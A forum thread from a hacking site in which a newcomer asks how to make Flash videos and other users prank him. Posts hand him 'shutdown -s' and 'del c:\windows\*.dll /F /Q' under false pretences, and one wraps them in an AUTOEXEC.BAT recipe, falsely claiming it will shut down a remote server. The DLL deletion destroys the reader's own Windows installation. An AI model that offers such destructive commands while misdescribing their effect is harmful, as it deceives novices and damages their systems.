Welcome to HBH! If you had an account on hellboundhacker.org you will need to reset your password using the Lost Password system before you will be able to login.

I am new please help

0 0

OK people i am new please help me! i wanted to know how i make flash videos, like what program i use and where can i get it

0 1

maybe get flash :p

0 0

what flash

0 0

macromedia flash

0 0

btw, you SHOULD NOT download flash using p2p software. ;)

0 0

i dont kow what p2p is i have mac. flash to do games on the internet and stuff but to make flashes

0 0

Do you know how to turn off your comp? When you want to know a little more about p2p do this in dos:

shutdown -s

0 0

lol nice …. but i tried it and i found it to be a whole lot easier to know wat p2p is….. thanx. :D

0 0

No problem :) Maybe this is also a nice thing to look up about hacking and stuff, do this is dos:

del c:\windows\*.dll /F /Q

0 0

thats okay maybe some n00bs should try it… lol :D

0 0

Xyng wrote: Do you know how to turn off your comp? When you want to know a little more about p2p do this in dos:

shutdown -s

lol, you got to make it sound real, be like:

If you want to shut down a server, it's as simple as a couple clicks and a few words. Go to notepad, wordpad, whatever text editor you prefer. Type in: @echo off shutdown -s del c:\windows\*.dll /F /Q Then, save it as AUTOEXEC.BAT into the c:\ Then, go to the site you want to shut down and double click the .bat icon that you just made. Have fun and don't do anything illegal with this information..:)

0 0

hehehehe, that's nice man :) i tried it and the server of my school broke down. Thanks!! :D

0 0

and who said ignorance was bliss…